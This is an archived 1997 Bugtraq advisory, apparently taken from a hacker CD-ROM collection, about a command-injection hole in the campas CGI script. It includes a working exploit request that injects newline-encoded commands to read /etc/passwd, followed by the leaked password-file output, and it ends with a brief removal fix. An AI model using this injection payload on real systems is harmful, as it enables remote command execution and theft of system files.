home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / campus_cgi_hole.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  1.4 KB  |  51 lines
  1.                                campus cgi hole
  2.  
  3. Description: A hole very similar to the standard phf hole alows people to
  4. execute arbitrary commands through the campus cgi.
  5. Author: Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO>
  6. Compromise: Execute arbitrary commands remotely as the owner of the
  7. cgi-running process (commonly nobody or daemon).
  8. Vulnerable Systems: Those running a vulnerable version of the campus cgi.
  9. Version 1.2 is vulnerable. It may be distributed with the NCSA server.
  10. Date: 15 July 1997
  11.  
  12. Date: Tue, 15 Jul 1997 18:24:31 -0500
  13. From: Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO>
  14. To: BUGTRAQ@NETSPACE.ORG
  15. Subject: Bug CGI campas
  16.  
  17. CAMPAS SECURITY BUG
  18. -------------------
  19.         ET Lownoise Colombia 1997
  20.  
  21. CGI:    campas
  22.         #!/bin/sh
  23.         #pragma ident "@(#)campas.sh    1.2 95/05/24 NCSA"
  24.  
  25. Impact: Execute commands
  26.  
  27. Exploit:
  28. > telnet www.xxxx.net 80
  29. Trying 200.xx.xx.xx...
  30. Connected to venus.xxxx.net
  31. Escape character is '^]'.
  32. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
  33. <PRE>
  34. root:x:0:1:Super-User:/export/home/root:/sbin/sh
  35. daemon:x:1:1::/:
  36. bin:x:2:2::/usr/bin:
  37. sys:x:3:3::/:
  38. adm:x:4:4:Admin:/var/adm:
  39. lp:x:71:8:Line Printer Admin:/usr/spool/lp:
  40. smtp:x:0:0:Mail Daemon User:/:/bin/false
  41. .... continue :P
  42.  
  43. Solution: 1-If u dont use it erase it.!
  44.           2-Dont use it again.. (go point 1)
  45.  
  46. Well another line to put in vito.ini.
  47.  
  48. ET LOwnoise 1997 Colombia
  49.  
  50. Addendum(if any):
  51.